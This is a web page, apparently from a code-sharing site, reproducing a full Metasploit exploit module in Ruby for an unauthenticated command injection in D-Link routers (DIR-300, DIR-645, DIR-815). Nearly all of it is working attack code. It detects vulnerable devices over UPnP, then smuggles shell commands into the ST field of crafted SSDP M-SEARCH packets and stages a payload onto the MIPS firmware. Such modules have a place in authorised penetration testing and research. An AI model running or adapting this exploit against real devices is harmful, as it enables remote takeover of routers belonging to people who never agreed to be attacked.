扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 |
## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name'=> 'D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection', 'Description' => %q{ Different D-Link Routers are vulnerable to OS command injection via UPnP Multicast requests. This module has been tested on DIR-300 and DIR-645 devices. Zachary Cutlip has initially reported the DIR-815 vulnerable. Probably there are other devices also affected. }, 'Author'=> [ 'Zachary Cutlip', # Vulnerability discovery and initial exploit 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module and verification on other routers ], 'License' => MSF_LICENSE, 'References'=> [ ['URL', 'https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection'], # original exploit ['URL', 'http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html'] # original exploit ], 'DisclosureDate' => 'Feb 01 2013', 'Privileged' => true, 'Targets' => [ [ 'MIPS Little Endian', { 'Platform' => 'linux', 'Arch' => ARCH_MIPSLE } ], [ 'MIPS Big Endian', # unknown if there are big endian devices out there { 'Platform' => 'linux', 'Arch' => ARCH_MIPS } ] ], 'DefaultTarget'=> 0 )) register_options( [ Opt::RHOST(), Opt::RPORT(1900) ], self.class) deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') end def check configure_socket pkt = "M-SEARCH * HTTP/1.1\r\n" + "Host:239.255.255.250:1900\r\n" + "ST:upnp:rootdevice\r\n" + "Man:\"ssdp:discover\"\r\n" + "MX:2\r\n\r\n" udp_sock.sendto(pkt, rhost, rport, 0) res = nil 1.upto(5) do res,_,_ = udp_sock.recvfrom(65535, 1.0) break if res and res =~ /SERVER:\ Linux,\ UPnP\/1\.0,\ DIR-...\ Ver/mi udp_sock.sendto(pkt, rhost, rport, 0) end # UPnP response: # [*] 192.168.0.2:1900 SSDP Linux, UPnP/1.0, DIR-645 Ver 1.03 | http://192.168.0.2:49152/InternetGatewayDevice.xml | uuid:D02411C0-B070-6009-39C5-9094E4B34FD1::urn:schemas-upnp-org:device:InternetGatewayDevice:1 # we do not check for the Device ID (DIR-645) and for the firmware version because there are different # dlink devices out there and we do not know all the vulnerable versions if res && res =~ /SERVER:\ Linux,\ UPnP\/1.0,\ DIR-...\ Ver/mi return Exploit::CheckCode::Detected end Exploit::CheckCode::Unknown end def execute_command(cmd, opts) configure_socket pkt = "M-SEARCH * HTTP/1.1\r\n" + "Host:239.255.255.250:1900\r\n" + "ST:uuid:<code>#{cmd}</code>\r\n" + "Man:\"ssdp:discover\"\r\n" + "MX:2\r\n\r\n" udp_sock.sendto(pkt, rhost, rport, 0) end def exploit print_status("#{rhost}:#{rport} - Trying to access the device via UPnP ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failed to access the vulnerable device") end print_status("#{rhost}:#{rport} - Exploiting...") execute_cmdstager( :flavor=> :echo, :linemax => 950 ) end # the packet stuff was taken from the module miniupnpd_soap_bof.rb # We need an unconnected socket because SSDP replies often come # from a different sent port than the one we sent to. This also # breaks the standard UDP mixin. def configure_socket self.udp_sock = Rex::Socket::Udp.create({ 'Context' => { 'Msf' => framework, 'MsfExploit' => self } }) add_socket(self.udp_sock) end # # Required since we aren't using the normal mixins # def rhost datastore['RHOST'] end def rport datastore['RPORT'] end # Accessor for our UDP socket attr_accessor :udp_sock end |
体验盒子
